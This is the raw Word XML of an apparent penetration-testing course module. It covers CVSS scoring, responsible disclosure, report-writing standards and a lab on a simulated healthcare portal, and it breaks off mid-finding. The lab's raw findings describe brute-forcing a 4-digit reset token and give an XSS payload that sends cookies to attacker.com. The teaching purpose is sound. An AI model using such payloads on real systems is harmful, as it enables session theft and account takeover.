              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Score: 5.3 — MEDIUM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># Use the official CVSS calculator:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t># https://www.first.org/cvss/calculator/3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>CVSS vs. Business Risk: An Important Distinction</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>CVSS measures technical severity, not business risk. A CVSS 9.8 vulnerability on an isolated internal development server that stores no sensitive data may be lower business risk than a CVSS 5.0 vulnerability on a payment processing system accessible to mil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>lions of customers. Always contextualize CVSS scores with business impact, asset criticality, and environmental factors. Professional reports document both the CVSS score and a qualitative business risk assessment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Responsible Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible disclosure (also called coordinated disclosure) is the ethical practice of reporting vulnerabilities to the affected organization before publishing them publicly, giving them time to develop and deploy a fix. This protects users while ensuring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>the vulnerability is eventually made public to benefit the security community.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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Disclosure Model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Description &amp; Considerations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Responsible / Coordinated Disclosure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Researcher reports privately to vendor. Vendor acknowledges and works toward a fix. Research</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>er waits a reasonable time (typically 90 days — Google Project Zero standard) before public disclosure. Balances vendor fix time with public awareness.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Full Disclosure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Vulnerability details are published immediately and publicly without prior notification to the vendor. Pressures vendors to respond but may expose users to exploitation before a patch exists. Controversial approach.</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Bug Bounty Programs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 xml:space="preserve">Organizations formally invite researchers to find and report vulnerabilities in exchange for financial rewards. Platforms: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>HackerOne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Bugcrowd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Intigriti</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>. Provides structured, safe channel for responsible disclosure with defined scope and rewards.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No Disc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>losure (Silent Fix)</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Vendor fixes the vulnerability without public acknowledgement. Provides no credit to researcher and prevents the security community from learning from the finding. Discouraged by the security research community.</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Zero-Day Disclosure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A vulnerability that is disclosed (or actively exploited) before the vendor is aware or has a patch available. Extremely dangerous — widely exploited by attackers once known.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>The 90-Day Disclosure Standard</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Google's Project Zero team established the widely adopted 90-day standard: researchers notify the vendor privately and give them 90 days to release a patch before publishing details publicly. If the vendor fails to patch within 90 days, the vulnerability i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>s published regardless. This creates accountability while giving vendors reasonable time to respond. Many bug bounty programs operate under similar timelines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Submit a Responsible Disclosure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>When you discover a vulnerability in a real-world</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> system outside of an authorized engagement, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Verify the finding — ensure it is a real vulnerability and not a false positive before reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">Check for a security.txt file at /.well-known/security.txt or a bug bounty program on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>HackerOn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Bugcrowd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>If no formal program exists, email security@company.com or report through their contact page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Write a clear, professional report: vulnerability description, steps to reproduce, impact, and your contact information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Do NOT access, modify, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> any data beyond what is necessary to prove the vulnerability exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Do NOT publicly disclose until the vendor has had a reasonable opportunity to respond (minimum 30–90 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Keep records of all communications in case of disputes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Request CVE assignment through MITRE if the vulnerability is significant and patched</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Writing Quality &amp; Professional Standards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="60" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The technical accuracy of findings means nothing if they are poorly commun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve">icated. Professional security reports are judged on their clarity, consistency, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>actionability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>. The following standards apply to all security documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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Quality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80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Guidance &amp; Common Mistakes to Avoid</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Clarity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Write in plain, direct sentences.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> Avoid unnecessary jargon when plain language works. Every sentence should serve a purpose. Avoid: 'The aforementioned vulnerability in question exhibits characteristics consistent with…'. Use: 'This vulnerability allows an attacker to...'</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Be specific. Name the exact endpoint, parameter, version, or configuration. Avoid: 'The login form is vulnerable'. Use: 'The POST /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> endpoint is vulnerable to SQL injection via the email parameter (line 47 of auth.py)'.</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Reproducibility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Steps to reproduce must be complete and exact. Another person following your steps should be able to reproduce the finding on their first attempt without guessing.</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Audience Awareness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 xml:space="preserve">Write descriptions for technical readers (developers, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>sysadmins</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">). Write </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>business impact for non-technical readers (management, executives). Never assume all readers have the same background.</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Objectivity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 xml:space="preserve">Report facts, not opinions or assumptions. Do not sensationalize. Do not minimize. 'This vulnerability could potentially allow unauthorized access' is weaker than 'This vulnerability allows an unauthenticated attacker to read all customer records from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>database'.</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Consistency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Use the same severity scale throughout. Use the same terminology for the same concepts. Number findings consistently. Use consistent formatting for all findings.</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Evidence Quality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rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Screenshots must be clear, properly cropped, and directly relevant to the finding. Annotate arrows or highlights to draw attention to key elements. Include timestamps where possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB45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Remediation Specificity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rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Never simply say 'fix the vulnerability' or 'apply patches'. Provide specific, actionable guidance with code examples, configuration changes, or references to fix documentation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hands-On Lab: Writing a Full Vulnerability Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB45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rsidTr="004610F1">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="2189"/>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140" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Lab Overview</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1" w:rsidP="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>In this lab, students will produce a complete, professional vulnerability report based on pre-defined findings from a simulated web application assessment. The goal is to practice translating raw technical findings into polished, professional documentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> that meets industry standards. Students will write findings, calculate CVSS scores, craft executive summaries, and compile a complete deliverable report.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Learning Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Apply the full vulnerability finding template to document real assessment findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Calculate CVSS scores and justify severity ratings with business context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Write a professional executive summary for a non-technical audience</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Produce a complete, formatted vulnerability report as a Word or PDF document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458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140" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t xml:space="preserve">Scenario: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>MindGigs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t xml:space="preserve"> Healthcare Portal Assessment</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">Background: You have been engaged to perform a web application penetration test on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>MindGigs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> Healthcare patient portal (https:/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>/portal.mindgigs-health.lab — local lab environment). The assessment was conducted over 3 days (simulated). The following raw findings were discovered during testing. Your task is to document each finding professionally using the standard template.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Raw F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>inding #1 — Provide to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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Raw Notes:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">The password reset function at /reset-password uses a predictable 4-digit numeric token sent by email. I brute-forced the token in under 3 minutes using Burp Suite Intruder (0000–9999 = 10,000 combinations). The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">application has no rate limiting on token attempts. Successfully reset the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>admin@mindgigs-health.lab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve"> account password and gained full admin access to patient records — approximately 12,000 patient health records including diagnosis codes, medications, and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>personal information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="00BB458B">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Raw Finding #2 — Provide to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40" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Raw Notes:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB458B" w:rsidRDefault="004610F1">
            <w:pPr>
              <w:spacing w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>Found reflected XSS in the patient search function. The 'name' parameter reflects user input directly into the page without encoding. Payload: &lt;script&gt;document.location='http://attacker.com/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>steal?c</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t xml:space="preserve">='+document.cookie&lt;/script&gt; — successfully </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>exfiltrated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="404040"/>
              </w:rPr>
